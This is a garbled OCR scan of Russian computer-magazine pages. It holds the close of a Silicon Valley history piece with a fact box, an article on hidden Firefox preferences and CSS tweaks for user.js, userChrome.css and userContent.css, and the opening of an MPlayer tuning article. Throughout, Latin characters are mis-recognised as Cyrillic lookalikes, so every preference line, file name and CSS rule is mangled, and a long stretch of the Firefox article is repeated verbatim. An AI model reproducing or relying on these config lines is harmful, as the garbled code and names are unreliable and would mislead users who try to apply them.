отношение к бывшим сотрудникам у него 
было однозначное: «Предатели». Но, в от- 
личие от Шокли, великолепная восьмерка 
отказываться от своих целей не собиралась 
и основала в Долине в 1957 году РаігсЫІсІ - 
компанию по изготовлению полупроводни- 
ков. Очень быстро эта маленькая компания 
завоевала всеобщее признание, и в 1 958 
году ІВМ заказала у нее партию кремниевых 
транзисторов, которую собиралась исполь- 
зовать в слотах памяти своих компьютеров. 
Контракт потом был продлен, и это стало 
началом долгого сотрудничества ІВМ с 
Кремниевой долиной. Примеру РаігсЫІсІ 
последовали другие, бум полупроводнико- 
вой промышленности захлестнул Америку. 
Некоторые фирмы вскоре закрывались, 
другие, такие как Іпіеі, АІѴЮ и ІМайопаІ 
Зетісопсіисіог, имели огромный успех. 

В 80-х годах одной из самых успешных ком- 
паний Кремниевой долины была Арріе 
СотріЛег, которая из очередной гаражной 
фирмы за несколько лет превратилась в од- 
ного из ведущих поставщиков персональных 
компьютеров с ежегодным оборотом в мил- 
лиард долларов. А имена Стив Джобс и Стив 
Возняк стали известными на весь мир. 

А ЖИЗНЬ В КОМПЬЮТЕРНОЙ 
МЕККЕ 

На протяжении 80-90-х годов Кремниевая 
долина постоянно развивалась. Количество 
фирм на ее территории росло, вместе с 
тем преображались и города в пределах 
Вау Агеа. Чтобы обеспечить всем необхо- 
димым лучшие технические умы Америки, 




Первое промышленное здание Кремниевой долины 



было построено множество ресторанов, 
отелей, ночных клубов и прочих развлека- 
тельных заведений. 

Климат в Кремниевой долине отличный: зи- 
мой здесь по-калифорнийски тепло, а летом 
кругом цветет зелень. Раньше здесь было 
особенно много фруктовых садов, за что 
место называли Долиной удовольствий 
(ѴаІІеу о{ Неаіі'з БеНдМ). 

Несмотря на то что Кремниевую долину счи- 
тают мировым центром технических разра- 
боток, она вовсе не утыкана небоскребами 
лабораторий и техногенными постройками. 
Наоборот, города, которые находятся на ее 
территории, - Поло-Альто, Маунтин Вью, 
Санта-Клара, Сан-Хосе (самый крупный из 
всех, многие его считают столицей Кремни- 
евой долины), выглядят провинциально: ма- 
ленькие домики, аккуратные газоны и тихие 
улочки. Контраст по сравнению с ними сос- 
тавляют исследовательские комплексы и 
офисы ведущих технических компаний: 
АбоЬе Зузіетз, АІѴЮ, Арріе СотріЛег, Сізсо 
Зузіетз, еВау, ЕІесігопіс Аііз, Соодіе Іпс., 
НеѵѵІей-РаскагсІ, ІпіеІ, Махіог, МсАТее, 

МоііІІа Роипбайоп, ІМайопаІ Зетісопсіисіог, 
ИѴЮІА Согрога1:іоп, Огасіе Согрогайоп, Раіт 
Іпс., РауРаІ, Вііісоп СгарЫсз, Зип 
Місгозузіетз, Зутапіес, УаМоо! и др. Поми- 
мо гигантов, в долине живут менее извест 



НЕКОТОРЫЕ ФОНТЫ 0 КРЕМНИЕВОЙ ДОЛИНЕ 



- На территории 2,5 тысяч квадратных километров живет 2,5 млн. 
человек, при этом треть из них родилась за пределами США. 

- Каждый работник, проживающий в Кремниевой долине, прино- 
сит своей компании в среднем $200 000 в год. 

- 43% населения долины имеет как минимум высшее образование. 

- Средняя цена особняка здесь составляет в районе $500 000. 

- Средняя годовая зарплата для тех, кто работает в компьютерной 
и телекоммуникационной областях - $160 000 в год. 

- Самыми популярными областями для инвестиций являются 
коммуникации и сетевые технологии (36% вложенных средств), а 
также программное обеспечение (21%). 

- На территории Долины находится один из самых дорогих при- 
ватных домов в США, построенный основателем компании 
Огасіе Ларри Эллисоном. 

- Очень популярным туристическим местом в Кремниевой доли- 
не является гигантский аквариум Мопіегеу Вау - едва ли не са- 
мый большой в стране. 

- Недалеко, в пяти часах езды на машине, от Вау Агеа находится 
Диснейленд, и работники компаний часто наведываются туда по 
выходным вместе с семьями. Также в семи часах езды находит- 
ся известная Долина смерти, в которой начиная с мая темпера- 
тура поднимается до критической отметки. 



ные и практически неизвестные компании, 
руководители которых мечтают одним прек- 
расным днем заткнуть за пояс всех 
монстров хай-текового рынка. Всего здесь 
нашли приют более 2000 компаний. 
Расположение офисов выбрано не просто 
так. Все компании со сходными направлени- 
ями деятельности соседствуют друг с дру- 
гом. На северо-западе, в Поло-Альто, разме- 
щены исследовательские центры, где каж- 
дый год появляются новые изобретения. На 
юго-востоке находится крупное скопление 
фирм-производителей полупроводников. В 
южной части долины, в пригород Сан-Хосе, 
в основном живут иностранцы и бедняки, ко- 
торых нанимают на черновую работу. 
Несмотря на активную конкуренцию, предс- 
тавители разных компаний относятся друг к 
другу очень дружелюбно и нередко собира- 
ются в каком-нибудь барчике, чтобы пропус- 
тить по чарке пива и посплетничать на свои 
технические темы. Ситуация, когда инженер 
компании обращается за помощью к коллеге 
из конкурирующей фирмы, здесь случается 
не так уж редко. 

В Кремниевой долине удивительная теку- 
честь кадров. По результатам исследований, 
рядовой работник здесь в среднем меняет 
место работы каждые два года. И при этом 
совсем не обязательно забирать семью и 
ехать в чужие земли. Все работодатели на- 
ходятся под рукой. Работнику, желающему 
уволиться, нужно только подписать 9-стра- 
ничный договор, который запрещает ему на- 
нимать других сотрудников компании. Редко 
люди уходят по финансовым соображениям - 
зарплаты здесь выше средних. Но и жизнь в 
долине в целом дороже. Например снимать 
приличную двухкомнатную квартиру на окра- 
ине обойдется в 1400 долларов в месяц, а 
симпатичный однокомнатный коттедж в По- 
ло-Альто - 2000. Большинство работников 
Кремниевой долины работают за много ки- 
лометров от своего дома, каждый день пре- 
одолевая их по утрам. 

Тем, кто решил начать свое дело, местный 
банк и инвесторы всегда готовы оказать 
финансовую поддержку. Но в этом случае 
придется столкнуться с постоянным давле- 
нием, нереальными дедлайнами и работой 
по 70 часов в сутки, чтобы вытащить свою 
компанию на поверхность. Наградой может 
стать известность и много денег или пол- 
ное банкротство и перспектива до конца 
дней выплачивать долги. 




Здание Арріе 



Кремниевая долина - одно из самых замеча- 
тельных мест на Земле, и многие техничес- 
кие умы приезжают сюда, чтобы внести свой 
вклад в бурное развитие технологий. Но 
только лучшим из них удается устроиться и 
занять свое место среди жителей долины. 
Как насчет тебя, мой юный друг? ЗС 



ДО СЕКСА 



ПОСЛЕ ОФИСА. 




ИГРЫ 



ѴѴогІсІ оі ѴѴагсгаЙ. 

ВНгіагб старательно вылизала игру до равномерного 
идеального блеска. Нам остается только восторженно щуриться 



2 СО 



с каждым 

номером 



ШТЯ: Ліе ВаЫе Рог Міббіе-Еагііі. 

Батальные сцены из фильма "Властелин колец" вошли в 
историю кинематографа. В игре они такие же. 

ПРАВДА ЖИЗНИ 

ИГРЫ: ОТ КОМПЬЮТЕРНЫХ К СЕКСУАЛЬНЫМ. 

Есть гипотеза, что если девушка злится, видя тебя за 
монитором, дело не в тебе и не в играх. Дело в ее 
нереализованных фантазиях, амбициях, мечтах. . . 

ЖЕЛЕЗО 

Тест: ОУР-накопители. Читают и пишут, чего же боле. 




УЖЕ В ПРОДАЖЕ 

(да ше)ІатІ 








0 руках опытного пользователя Гігеіох превращаетсп в эдакую шкатулку с секретен - надо только подобрать к ней ключи, и откроются 
новые возможности браузера, скрытые разработчиками от посторонних глаз. Почему все доступные настройки РігеРох не вынесены в 
соответствующее окно - вопрос к разработчикам. Иы же, помня, что нормальные герои всегда идут в обход, тщательно изучим, как можно 
достучаться до скрытых функций РігеРох. 

настройка скрытых возможностей брпузерп еінееох 




А варианты 

ИЗМЕНЕНИЯ НОСТРОЕК 

К роме незамысловатого окна 
Настроек, для редактирования 
разных установок можно 
использовать черный ход, обра- 
щаясь напрямую к переменным 
движка конфигурации. Пере- 
менные можно изменять либо 
переопределять. Это две раз- 
ные вещи. Чтобы изменять настройки, надо 
дать в адресной строке следующий ІЛ: 
"аЬоіЛюопйд". При этом в новом табе браузера 
откроется редактор свойств не только самого 
РігеТох, но и установленных в текущем профиле 
ХРІ -компонентов. Редактор этот чем-то напо- 
минает ВедЕсІф только объектно-ориентиро- 
ванный. Например у объекта Ьгоѵѵзег есть 
свойство-объект зіагіир, а у того, в свою оче- 
редь, свойство Ііотераде - страница по умол- 
чанию. Чтобы она была пустой, достаточно 
прописать в значении этого свойства строку 
аЬоіЛ:Ыапк. 

Другой способ изменения параметров браузе- 
ра и плагинов заключается в создании файла 
изещз и внесении в него новых значений наст- 
роек. Таким образом, базовая конфигурация 
браузера не меняется, и можно эксперименти- 



ровать сколько угодно. Чтобы все отменить, 
достаточно будет потом удалить этот файл или 
стереть в нем записи, которые привели брау- 
зер к нестабильной работе. В таком случае 
(при отсутствии изег.із или записей в нем) 
ПгеТох будет использовать значения по умолча- 



нию. В 1_іпих и *В50 путь к директории, где на- 
до разместить изег.із, таков: 

~/. то 2 ІІІа/ТігеТох/сІеТаиІ 1 :.ххх/. 

Еще мы будем править файлы изегСІтоте.сзз 
и изегСопМ.сзз. Их надо создать и сохранить 
в директории СІіготе, которая, в свою оче- 
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редь, находится там же, где и упомянутый вы- 
ше файл изег.із. Здесь и далее по тексту, кроме 
специально оговоренных случаев, будет подра- 
зумеваться, что редактируется именно изег.із, а 
не какие-либо иные файлы. Если же я привожу 
имя переменной, похожее на ассеззіЬіІііу.Шо- 
сиз, то это отсылка к переменной главного кон- 
фига, который доступен по аЬоиіюопіід и перек- 
рывается изег.із. 

Файлы изег.із, изегСІіготе.сзз и изегСопіепі.сзз 
важны еще потому, что с их помощью можно 
реализовать функции многих плагинов РігеТох. И 
вместо того чтобы с установкой новой версии 
РігеТох заново качать и переустанавливать пла- 
гины, можно просто использовать эти файлы со 
своими настройками. 

Чтобы удобнее было излагать материал, я тема- 
тически разбил скрытые возможности РігеТох на 
разделы. Итак, приступим. 

^ОТРИСОВКОІНЕВ-СТРПНИЦ 

Начнем с самого простого. Вот как можно вклю- 
чить отрисовку картинок по мере их загрузки: 

изег_рге1 : ( ,, Ьгоѵѵ$ег.сІі$рІау.$Ііоѵѵ_ітаде_рІасеііоІсІег$ ,, г І'аізе); 

Можем включить такой режим отрисовки, при 
котором страница будет отображаться сразу по 
мере поступления и парсинга первых байтов: 

изег_рге(( п пдІауоиипіііаІраіпУеІау", 0); 

Надо сказать, что это на самом деле несколько 
замедляет загрузку страницы в целом, просто 
кажется, что она быстрее открывается. 

ВѴТНЕ1Ш... 



Некоторых веб-дизайнеров хлебом не корми, 
дай только мигающий текст на странице по- 
казать. Делают они это примерно так: <зрап 
зіуіе- 'іехі-сіесогаііоп: Ыіпк">наш мигающий 
текст</зрап>. Не знаю, как тебя, а меня та- 
кие штуки всегда раздражали. Поэтому я их 
отключаю, благо, РігеТох это позволяет: 

и$ег_рге(( ,, Ьгоііѵ$ег.Ыіпк_аІІоі(ѵесІ І, ЛаІ$е); 

Не менее достает и бегущая строка - тагциее. 
Чтобы блокировать ее, добавляем в файл 
изегСопіепі.сзз такие строки: 

тагциее 

{ 

-то 2 -Ьіп(ііпд: попе Іітрогіапі; 
бізріау: Ыоск; 

Ііеідііі: аиіо Іітрогіапі; 

} 

В итоге бегущий ранее текст не будет прокру- 
чиваться. А вот как можно придать всем кадрам 
(Тгатез) на веб-странице возможность измене- 
ния пользователем размеров: 

изег_рге[( ,, ІауоиУгате$Тогсе_ге$і 2 аІ)іІііу"Лгпе); 

^ ЭЛЕМЕНТЫ 
интерфейс» и поведение 

Не знаю, почему строка поиска в Рігеіох по 
умолчанию такая маленькая. Неужели разработ- 
чики предполагают, что если человек ищет что- 
либо в Ооодіе, то это определяется одним ко- 
ротким словом? Думаю, что сделать строку по- 
иска шире хочет, по крайней мере, каждый вто- 



Для подогревания интереса к любому программному продукту в 
нем должна быть интрига. Факт, что разработчики реализовали 
в РігеТох'е больше функций, чем кажется на первый взгляд, - это 
и есть интрига. Ожидая новые версии РігеТох, пользователь мо- 
жет коротать время, выискивая скрытые опции и чудодействен- 
ные переменные... 

На самом деле многие дополнения РігеТох - это графические ин- 
терфейсы к уже реализованным, но скрытым от посторонних 
глаз возможностям браузера. Например плагин Тѵѵеак ІЧеіѵѵогк 
ЗеТТіпдз предоставляет удобный доступ к переменным, которые 
мы рассмотрели в этой статье в разделе «Сетевые настройки». 



рой пользователь. Такая возможность существу- 
ет. В файл изегСІіготе.сзз добавь следующее 
(в этом примере мы сделали строку поиска ши- 
риной в 420 пикселов): 

йзеагсітсопіаіпег, НзеагсТіЬаг 
{ 

-тоі-Ьох-ТІех: 420 МтрогТапТ; 

} 

Сообщения об ошибках РігеТох имеет обыкнове- 
ние показывать в выскакивающих диалоговых 
окнах. Меня эти окошки раздражают. 

Я предпочитаю, чтобы об ошибках сообщалось 
в открываемых в табах веб-страниц. Поэтому я 
добавляю такую команду: 

изег_рге(( ІІ Ьгоѵѵ$ег.хиІ.еггог_раде$.епаЫесІ ,І ,ігие); 

Теперь давай заставим указатель мыши нести 
информационную нагрузку. Чтобы он приобре- 
тал вид крестика при наведении на ссылку, ко- 
торая открывает страницу в новом окне, добавь 
в изегСопТепТ.сзз: 

:Ііпк[ТагдеТ="_Ыапк ІІ ] г 

:ѵізііе(1[іагдеі= І, _Ыапк ,, ] І 

:Ііпк[ТагдеТ="_пеѵѵ"], 

:ѵізііе(1[іагдеі= || _пеѵѵ"] 

{ 

сигзог: сгоззііаіг; 

} 

А чтобы просигналить тебе о том, что указатель 
мыши находится в свободном полете над ссыл- 
кой, которая запускает ЦаѵаЗсгірІ:, в тот же 
изегСопіепі.сзз смело прописывай: 

аИігеР-'іаѵазсгірі:"] 

{ 

сигзог: тоѵе; 

} 

Скроллбар также поддается настройке. Для 
изменения вида полос прокрутки нам при- 
дется вносить изменения в оба файла - как в 
изегСІіготе.сзз, так и в изегСопіепі.сзз. Про- 
писываются туда одни и те же строки. При- 
вожу ниже типовые заготовки. Полоса прок- 
рутки в стиле Мае, с кнопками управления 
внизу и бегунком над ними: 

зс^оII^)а^^)иііоп[з^)аіі^= ,, 5с^оII^)а^-ирЧор ,, ] 

{ 

(Іізріау: попе Іітрогіапі; 

} 

зсгоІІІ)агІ)иііоп[зІ)аііг= ,, 5сгоІІІ)аг-ир-1)оііопі 11 ] 

{ 

(Іізріау: -тог-Ьох Іітрогіапі; 

} 

Полоса прокрутки в стиле Мае, с кнопками уп- 
равления наверху и бегунком под ними: 

5СгоІІЬагЬиііоп[$Ьаііг="зсгоІІЬаг-ир-Ьоііот"] 

{ 

(Іізріау: -тог-Ьох Іітрогіапі: 

} 

Полоса прокрутки, похожая на ту, что в КОЕ- 
стиле РІазііс, то есть кнопки управления бегун- 
ком внизу и одна сверху, а сам бегунок между 
ними: 

$сгоІІЬагЬиііоп[$Ьаііг= ,, зсгоІІЬаг-ир-Ьоііот"] 

{ 

(Іізріау: -тог-Ьох Іітрогіапі: 

} 

Наконец, вот как можно вообще убрать кнопки 
управления бегунком: 




л На Хакер СО/ОѴй 
ты найдешь приме- 
ры конфигов, са- 
мые последние 
версии популярных 
браузеров и ХРІ- 
дополнений. 
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5СгоІІЬагЬииоп[$Ьа1іг= м $сгоІІЬаг-ир-Іор"], 

5СгоІІЬагЬииоп[$Ьа1іг= м $сгоІІІ)аг-(Іоѵііп-Ьоиот"] 

{ 

(Іізріау: попе Іітрогіапі; 

} 

Если тебя достали ссылки, которые открыва- 
ются в новых окнах (это когда верстальщик 
страницы сделал так: іагдеі- '_Ыапк"), то это 
поведение можно переопределить посред- 
ством очередных скрытых опций. В Рііе -> 
Ргеіегепсез -> АбѵапсесІ есть скрытая сек- 
ция, называется «Рогсе Ііпкз іііаі ореп пеѵѵ 
ѵѵіпсіоѵѵз іо ореп іп» («Вынудить ссылки отк- 
рывать новые окна в...») и далее две опции: 
«іііе зате іаЬ/ѵѵіпсІоѵѵз аз іііе Ііпк» («в том же 
табе/окне, что и ссылка») и «а пеѵѵ іаЬ» («в 
новом табе»). 

Чтобы эти опции и сама секция были доступ- 
ны, добавь в изег.із строку: 

изег_ргеі : ( ,, Ьгоѵѵ5ег.1:аЬз.5^10ѵѵЗіпдIеVVіп(]оѵѵМосIеРгеі : з , ^ 

Ігие); 



ся это в файле изегСІтготе.сзз примерно 
так: 

.іаЬЬгоѵѵзег-іаЬз .іаЬ-іехі 
{ 

ш-ш. 90%; 

} 

Здесь мы задаем размер шрифта для букв 
на корешках табов равным 90 процентам. 
Приведу еще несколько довольно ценных с 
практической точки зрения способов наст- 
ройки табового движка. Открывать новую 
ссылку в фоновой вкладке можно так: 

и$ец)геі( , Ъѵш.іаЬз.Іоа(ІІпВаскдгоипГ ігие); 

Открывать ссылку из Закладок в новом табе: 

изег.ргеіО'Ьгоѵѵзег.іаЬз.орепіаЬіог.Ьооктагкз", ігие); 

Открывать ссылку в новом табе в ЛЮБОМ 
случае, когда требуется открытие нового 
окна: 

изег_ргеі( II Ьгоѵѵ5ег.іаЬ5.орепіаЬіог.ѵѵіп(іоѵѵореп , ^ ігие): 




полосы прокрутки 



Как отмечают разработчики, функции эти еще 
экспериментальны, поэтому могут глючить. 

Вот, кстати, причина сокрытия их от посторон- 
них глаз. Далее, если тебя страшно раздража- 
ют иконки сайтов в дереве списка закладок, то 
можешь отключить их так: 

и5ег_ргеі("Ьгоѵѵ5ег.с^1готе.зііе^сопз , ^ іаізе); 

изег_ргеі("Ьгоѵѵ5ег.сПготе.іаѵісопз", іаізе); 

Одно из преимуществ Орега перед Рігеіох 
заключается, на мой взгляд, в том, что Орега 
может отображать одновременно большее 
количество корешков вкладок, масштабируя 
их до бесконечности. Рігеіох тоже умеет 
масштабировать, однако не так изящно. В 
итоге полоса корешков табов очень быстро 
заполняется, атабы, не поместившиеся на 
ней, остаются вне пределов досягаемости, 
причем какие-либо средства прокрутки этих 
корешков, похоже, не предусмотрены. Нау- 
чить Рігеіох масштабировать корешки как-то 
иначе, наверное, не удастся, но вот повлиять 
на размер шрифта корешков можно. Делает- 



Раз уж зашла речь о табах, то поговорим 
немного об одноименной клавише ТаЬ, а 
точнее, об ее функции на веб-страницах. На- 
жатие ТаЬ перемещает фокус, но каким об- 
разом? Для управления этим существует пе- 
ременная ассеззіЬіІііу.іаЬіосиз. 



Значения переменной ассеззіЬіІііу.іаЬіосиз 



1 - фокус перемещается только между текстовыми полями 

2 - между всеми элементами управления, кроме 

текстовых полей 

3 - все элементы управления 

4 - ссылки и картинки, являющиеся ссылками 
7 - все ссылки и элементы управления 



Ну и о мелочах жизни. Длина списка истории в 
строке адреса по умолчанию равна 50. Это зна- 
чение можно изменять в переменной 
Ьгоѵѵзег . зеззіоп М ізіогу . тах епігіез. Например: 

и5ег_р^еі( ,, Ь^оѵѵзе^.5еззіопЬізіо^у.^паx_епігіез ,, , 77); 



РПЗМЕЩЕНИЕ ВОЛШЕБНЫХ К0НФИГ0В 



Под ѴѴіпсІоѵѵз ХР и ѴѴіпсІоѵѵз 2000 путь к директории, где надо раз- 
местить изегдз, изегСИготе.сзз и изегСопіепі.сзз, таков: 

дискЛОоситепіз апсі Зеіііпдз\имя_пояьзоватеяя\АррІісаііоп 
Оаіа\Мо 2 іІІа\Рігеіох\РгоііІез\сІеіаиІі.ххх\ 

Для ѴѴіпсІоѵѵз 95/98/Ме путь будет следующий: 

дискЛѴѴІЫООѴѴЗѴАррІісаііоп 

Оаіа\Мо 2 іІІа\Рігеіох\РгоііІез\сІеіаиІі.ххх\ 



А вот выделение содержимого адресной строки 
по одному щелчку - попробуй, очень удобно: 

изег_ргеі("Ьгоѵѵзег.игІЬаг.сІіскЗеІесізАП", ігие); 

Подробно вникать в тему изменения цветов 
Рігеіох не будем, но один полезный совет на 
этот счет все-таки дам. Цвет фона для строки 
поиска текста можно задавать с помощью пере- 
менной Ьгоѵѵзег.сІізрІау.іосиз_ЬаскдгоипсІ_соІог - 
значение обычного НТМЬформата равно 

II ГГ ЛЛГГ 

#ІШШ. 

А СЕТЕВЫЕ НІСТРОЙКИ 

Вначале о самом главном - ріреііпіпд. Не 
знаю, как правильно перевести «ріреііпіпд», 
но похоже, что именно «путепроводы» (ре- 
жим конвейерного соединения. - Прим, 
ред.). При общении по протоколу НИР дела- 
ются последовательные запросы данных - 
каждый следующий запрос осуществляется, 
только если удовлетворен предыдущий. При 
этом возможна значительная задержка перед 
тем, как сервер получит очередной запрос. 
Версия 1 . 1 протокола НИР поддерживает 
множественные запросы: в сокет идет сразу 
несколько запросов, а ответы на них в 
соответствующем порядке приходят потом. 
Это дает существенный прирост скорости 
загрузки страниц. Кроме того, уменьшается 
количество ТСР/ІР- пакетов. 

Такая технология и называется ріреііпіпд. По 
загадочным причинам в Рігеіох ее настройки 
скрыты. Но все тайное становится явным. 
Сначала включим ріреііпіпд: 

и$ег_ргеі( ІІ пеіѵѵогк.Ьіір.ріреІіпіпд ІІ ,ігие); 

и$ег_ргеі( ІІ пеіѵѵогк.Ьіір.ріреІіпіпд.іігзігедие$і ІІ ,ігие); 

Теперь установим максимальное количество 
одновременно посылаемых запросов. Напри- 
мер восемь: 

изег_ргеі( ,, пеіѵѵогк.Ьіір.ріреIіпіпд.таxге^иезіз ,, , 8); 

Если ты работаешь с Сетью через прокси, то 
включить ріреііпіпд для прокси надо так: 

изег_ргеі("пеіѵѵогк.Ьіір.ргоху.ріреІіпіпд", ігие); 

Если забраться в иерархию внутренних пе- 
ременных пеіѵѵогк, то можно обнаружить и 
другие настройки, открытые пользователям 
в Орега, однако скрытые в Рігеіох. К таковым 
относятся, например: 

пеішкМр.тах-соппесііопз (количество одновременных 
Ьіір-соединений) 

пеішк.Ьіір.тах-соппесііопз-рег-зегѵег (количество од- 
новременных Ьіір-соединений на один сервер) 

И то же для прокси: 

пеіѵѵогк.Иіір.тах-регзізіепі-соппесііопз-рег-ргоху 

пеіиѵогк.Ьіір.тах-регзізіепі-соппесііопз-рег-зегѵег 

Типовые значения: 



В МасОЗ X: ~/І_іЬгагу/АррІісаііоп Зиррогі/Рігеіох/РгоііІез/сІеіаиІі.ххх/ 




^$е^_р^еі( ,, пеішк.Ьіір.таx-соппесііопз ,, , 48); 
изег.ргеіС'пеіѵѵогк.іііір.тах-соппесііопз-рег-зегѵег", 16); 
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5СгоІІЬагЬииоп[$Ьа1іг= м $сгоІІЬаг-ир-Іор"], 

5СгоІІЬагЬииоп[$Ьа1іг= м $сгоІІІ)аг-(Іоѵііп-Ьоиот"] 

{ 

(Іізріау: попе Іітрогіапі; 

} 

Если тебя достали ссылки, которые открыва- 
ются в новых окнах (это когда верстальщик 
страницы сделал так: іагдеі- '_Ыапк"), то это 
поведение можно переопределить посред- 
ством очередных скрытых опций. В Рііе -> 
Ргеіегепсез -> АбѵапсесІ есть скрытая сек- 
ция, называется «Рогсе Ііпкз іііаі ореп пеѵѵ 
ѵѵіпсіоѵѵз іо ореп іп» («Вынудить ссылки отк- 
рывать новые окна в...») и далее две опции: 
«іііе зате іаЬ/ѵѵіпсІоѵѵз аз іііе Ііпк» («в том же 
табе/окне, что и ссылка») и «а пеѵѵ іаЬ» («в 
новом табе»). 

Чтобы эти опции и сама секция были доступ- 
ны, добавь в изег.із строку: 

изег_ргеі : ( ,, Ьгоѵѵ5ег.1:аЬз.5^10ѵѵЗіпдIеVVіп(]оѵѵМосIеРгеі : з , ^ 

Ігие); 



ся это в файле изегСІтготе.сзз примерно 
так: 

.іаЬЬгоѵѵзег-іаЬз .іаЬ-іехі 
{ 

ш-ш. 90%; 

} 

Здесь мы задаем размер шрифта для букв 
на корешках табов равным 90 процентам. 
Приведу еще несколько довольно ценных с 
практической точки зрения способов наст- 
ройки табового движка. Открывать новую 
ссылку в фоновой вкладке можно так: 

и$ец)геі( , Ъѵш.іаЬз.Іоа(ІІпВаскдгоипГ ігие); 

Открывать ссылку из Закладок в новом табе: 

изег.ргеіО'Ьгоѵѵзег.іаЬз.орепіаЬіог.Ьооктагкз", ігие); 

Открывать ссылку в новом табе в ЛЮБОМ 
случае, когда требуется открытие нового 
окна: 

изег_ргеі( II Ьгоѵѵ5ег.іаЬ5.орепіаЬіог.ѵѵіп(іоѵѵореп , ^ ігие): 




полосы прокрутки 



Как отмечают разработчики, функции эти еще 
экспериментальны, поэтому могут глючить. 

Вот, кстати, причина сокрытия их от посторон- 
них глаз. Далее, если тебя страшно раздража- 
ют иконки сайтов в дереве списка закладок, то 
можешь отключить их так: 

и5ег_ргеі("Ьгоѵѵ5ег.с^1готе.зііе^сопз , ^ іаізе); 

изег_ргеі("Ьгоѵѵ5ег.сПготе.іаѵісопз", іаізе); 

Одно из преимуществ Орега перед Рігеіох 
заключается, на мой взгляд, в том, что Орега 
может отображать одновременно большее 
количество корешков вкладок, масштабируя 
их до бесконечности. Рігеіох тоже умеет 
масштабировать, однако не так изящно. В 
итоге полоса корешков табов очень быстро 
заполняется, атабы, не поместившиеся на 
ней, остаются вне пределов досягаемости, 
причем какие-либо средства прокрутки этих 
корешков, похоже, не предусмотрены. Нау- 
чить Рігеіох масштабировать корешки как-то 
иначе, наверное, не удастся, но вот повлиять 
на размер шрифта корешков можно. Делает- 



Раз уж зашла речь о табах, то поговорим 
немного об одноименной клавише ТаЬ, а 
точнее, об ее функции на веб-страницах. На- 
жатие ТаЬ перемещает фокус, но каким об- 
разом? Для управления этим существует пе- 
ременная ассеззіЬіІііу.іаЬіосиз. 



Значения переменной ассеззіЬіІііу.іаЬіосиз 



1 - фокус перемещается только между текстовыми полями 

2 - между всеми элементами управления, кроме 

текстовых полей 

3 - все элементы управления 

4 - ссылки и картинки, являющиеся ссылками 
7 - все ссылки и элементы управления 



Ну и о мелочах жизни. Длина списка истории в 
строке адреса по умолчанию равна 50. Это зна- 
чение можно изменять в переменной 
Ьгоѵѵзег . зеззіоп М ізіогу . тах епігіез. Например: 

и5ег_р^еі( ,, Ь^оѵѵзе^.5еззіопЬізіо^у.^паx_епігіез ,, , 77); 



РПЗМЕЩЕНИЕ ВОЛШЕБНЫХ К0НФИГ0В 



Под ѴѴіпсІоѵѵз ХР и ѴѴіпсІоѵѵз 2000 путь к директории, где надо раз- 
местить изегдз, изегСИготе.сзз и изегСопіепі.сзз, таков: 

дискЛОоситепіз апсі Зеіііпдз\имя_пояьзоватеяя\АррІісаііоп 
Оаіа\Мо 2 іІІа\Рігеіох\РгоііІез\сІеіаиІі.ххх\ 

Для ѴѴіпсІоѵѵз 95/98/Ме путь будет следующий: 

дискЛѴѴІЫООѴѴЗѴАррІісаііоп 

Оаіа\Мо 2 іІІа\Рігеіох\РгоііІез\сІеіаиІі.ххх\ 



А вот выделение содержимого адресной строки 
по одному щелчку - попробуй, очень удобно: 

изег_ргеі("Ьгоѵѵзег.игІЬаг.сІіскЗеІесізАП", ігие); 

Подробно вникать в тему изменения цветов 
Рігеіох не будем, но один полезный совет на 
этот счет все-таки дам. Цвет фона для строки 
поиска текста можно задавать с помощью пере- 
менной Ьгоѵѵзег.сІізрІау.іосиз_ЬаскдгоипсІ_соІог - 
значение обычного НТМЬформата равно 

II ГГ ЛЛГГ 

#ІШШ. 

А СЕТЕВЫЕ НІСТРОЙКИ 

Вначале о самом главном - ріреііпіпд. Не 
знаю, как правильно перевести «ріреііпіпд», 
но похоже, что именно «путепроводы» (ре- 
жим конвейерного соединения. - Прим, 
ред.). При общении по протоколу НИР дела- 
ются последовательные запросы данных - 
каждый следующий запрос осуществляется, 
только если удовлетворен предыдущий. При 
этом возможна значительная задержка перед 
тем, как сервер получит очередной запрос. 
Версия 1 . 1 протокола НИР поддерживает 
множественные запросы: в сокет идет сразу 
несколько запросов, а ответы на них в 
соответствующем порядке приходят потом. 
Это дает существенный прирост скорости 
загрузки страниц. Кроме того, уменьшается 
количество ТСР/ІР- пакетов. 

Такая технология и называется ріреііпіпд. По 
загадочным причинам в Рігеіох ее настройки 
скрыты. Но все тайное становится явным. 
Сначала включим ріреііпіпд: 

и$ег_ргеі( ІІ пеіѵѵогк.Ьіір.ріреІіпіпд ІІ ,ігие); 

и$ег_ргеі( ІІ пеіѵѵогк.Ьіір.ріреІіпіпд.іігзігедие$і ІІ ,ігие); 

Теперь установим максимальное количество 
одновременно посылаемых запросов. Напри- 
мер восемь: 

изег_ргеі( ,, пеіѵѵогк.Ьіір.ріреIіпіпд.таxге^иезіз ,, , 8); 

Если ты работаешь с Сетью через прокси, то 
включить ріреііпіпд для прокси надо так: 

изег_ргеі("пеіѵѵогк.Ьіір.ргоху.ріреІіпіпд", ігие); 

Если забраться в иерархию внутренних пе- 
ременных пеіѵѵогк, то можно обнаружить и 
другие настройки, открытые пользователям 
в Орега, однако скрытые в Рігеіох. К таковым 
относятся, например: 

пеішкМр.тах-соппесііопз (количество одновременных 
Ьіір-соединений) 

пеішк.Ьіір.тах-соппесііопз-рег-зегѵег (количество од- 
новременных Ьіір-соединений на один сервер) 

И то же для прокси: 

пеіѵѵогк.Иіір.тах-регзізіепі-соппесііопз-рег-ргоху 

пеіиѵогк.Ьіір.тах-регзізіепі-соппесііопз-рег-зегѵег 

Типовые значения: 



В МасОЗ X: ~/І_іЬгагу/АррІісаііоп Зиррогі/Рігеіох/РгоііІез/сІеіаиІі.ххх/ 




^$е^_р^еі( ,, пеішк.Ьіір.таx-соппесііопз ,, , 48); 
изег.ргеіС'пеіѵѵогк.іііір.тах-соппесііопз-рег-зегѵег", 16); 



94 







0 опыііинство людей вполне удовлетворены теи, что используют программы с настройками по умолчанию. Но знаменитое умолчание 
подразумевает уравниловку, некий усредненный набор настроек, зачастую отнюдь не оптимальных. Так что же, будем сидеть сложа 
руки? Ни в коем случае! Итак, начинаем тотальную оптимизацию, под наркозом и без. О в роли пациента будет выступать лучший на 
сегодняшний день проигрыватель медиафайпов - Мріауеі. 



ИСПОЛЬЗУЕМ ПОПУЛЯРНЫЙ МЕДИРППЕЕР НО ПОЛНУЮ КПТУШКУ 



А 



А подготовка 

Т олько сборка Мріауег'а из ис- 
ходников позволит заточить 
плеер под конкретную систему, 
включить нужные тебе возмож- 
ности и отключить все, чем 
можно пренебречь. А значит, 
топаем на главный сайт проекта 
